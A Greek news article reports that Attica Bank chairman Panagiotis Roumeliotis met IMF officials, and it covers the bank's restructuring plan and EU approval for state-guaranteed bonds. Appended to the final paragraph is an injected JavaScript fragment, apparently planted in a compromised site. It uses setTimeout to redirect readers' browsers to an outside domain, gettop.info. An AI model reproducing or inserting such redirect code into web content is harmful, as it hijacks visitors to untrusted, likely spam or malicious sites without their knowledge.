Ρουμελιώτης: Η Attica Bank θα διαδραματίσει σημαντικό ρόλο στην παραγωγική δραστηριότητα της χώρας

0
4

 

Επαφές με στελέχη του ΔΝΤ είχε στην Ουάσινγκτον ο πρόεδρος της Attica Bank Παναγιώτης Ρουμελιώτης και εξέφρασε την αισιοδοξία του ότι η Τράπεζα θα μπορέσει σύντομα να διαδραματίσει σημαντικό ρόλο στην στήριξη της παραγωγικής δραστηριότητας της χώρας και ειδικότερα των μικρομεσαίων επιχειρήσεων.

Ο κ. Ρουμελιώτης, κατά τις επαφές του ενημέρωσε τα στελέχη του ΔΝΤ ότι την Πέμπτη 13 Οκτωβρίου θα συνεδριάσει υπό την προεδρία του η Επιτροπή Στρατηγικού Σχεδιασμού της Τράπεζας, που θα εξετάσει το σχέδιο αναδιάρθρωσης της και θα το εισηγηθεί την ίδια ημέρα στο διοικητικό συμβούλιο της τράπεζας.

Στο μεταξύ, γνωστοποιήθηκε πως η Attica Bank έλαβε την έγκριση από την DG Comp (γενική διεύθυνση ανταγωνισμού ΕΕ) για την έκδοση ομολόγων με εγγύηση του ελληνικού Δημοσίου τα οποία θα χρησιμοποιήσει για την άντληση ρευστότητας από τον ELA. Με την κίνηση αυτή η Attica Bank θα αποκτήσει ισχυρή κεφαλαιακή βάση και θα προχωρήσει στην πλήρη εξυγίανσή της και συμμόρφωση στις υποδείξεις του SSM και της ΤτΕ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here